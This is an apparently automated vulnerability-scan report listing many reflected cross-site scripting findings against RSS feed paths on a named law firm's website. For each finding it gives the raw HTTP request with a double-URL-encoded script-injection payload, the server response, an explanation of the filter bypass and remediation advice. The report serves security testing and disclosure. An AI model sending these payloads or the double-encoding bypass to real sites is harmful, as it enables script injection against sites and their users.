GET /rss96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56/events/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192 was submitted in the REST URL parameter 2. This input was echoed as 8d1d6"><script>alert(1)</script>3f934a0d192 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/events8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a was submitted in the REST URL parameter 3. This input was echoed as 5ac25"><script>alert(1)</script>a7c854d93a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/events/rss.xml5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c was submitted in the REST URL parameter 1. This input was echoed as cefc3"><script>alert(1)</script>b60ad84eb9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rsscefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c/in_the_news/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4 was submitted in the REST URL parameter 2. This input was echoed as cc00e"><script>alert(1)</script>d760b3b5dd4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/in_the_newscc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f was submitted in the REST URL parameter 3. This input was echoed as b6f54"><script>alert(1)</script>2151516518f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/in_the_news/rss.xmlb6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9 was submitted in the REST URL parameter 1. This input was echoed as 9abb7"><script>alert(1)</script>3d2f01cf3f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9/news_releases/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5 was submitted in the REST URL parameter 2. This input was echoed as dc1d0"><script>alert(1)</script>98c2f7af3b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/news_releasesdc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 was submitted in the REST URL parameter 3. This input was echoed as ee81a"><script>alert(1)</script>d27cf73a803 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/news_releases/rss.xmlee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9 was submitted in the REST URL parameter 1. This input was echoed as 32ca8"><script>alert(1)</script>73f8dfaacf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9/practices/Advertising/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862 was submitted in the REST URL parameter 2. This input was echoed as 5de32"><script>alert(1)</script>bc55ccc6862 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices5de32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc55ccc6862/Advertising/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5 was submitted in the REST URL parameter 3. This input was echoed as 80e2b"><script>alert(1)</script>09ca10697f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Advertising80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff was submitted in the REST URL parameter 4. This input was echoed as 86ab1"><script>alert(1)</script>6017d2c2dff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Advertising/rss.xml86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0 was submitted in the REST URL parameter 1. This input was echoed as 164d9"><script>alert(1)</script>7c58cabc2d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0/practices/Antitrust/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b was submitted in the REST URL parameter 2. This input was echoed as 9acfd"><script>alert(1)</script>287c030088b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b/Antitrust/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af was submitted in the REST URL parameter 3. This input was echoed as bd079"><script>alert(1)</script>bf831efe7af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Antitrustbd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb was submitted in the REST URL parameter 4. This input was echoed as 10885"><script>alert(1)</script>9f493b0ddcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Antitrust/rss.xml10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601 was submitted in the REST URL parameter 1. This input was echoed as 4b382"><script>alert(1)</script>d866589a601 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601/practices/Appellate/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40 was submitted in the REST URL parameter 2. This input was echoed as 83f09"><script>alert(1)</script>9da8d699e40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40/Appellate/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a was submitted in the REST URL parameter 3. This input was echoed as 3566d"><script>alert(1)</script>021d1023e4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
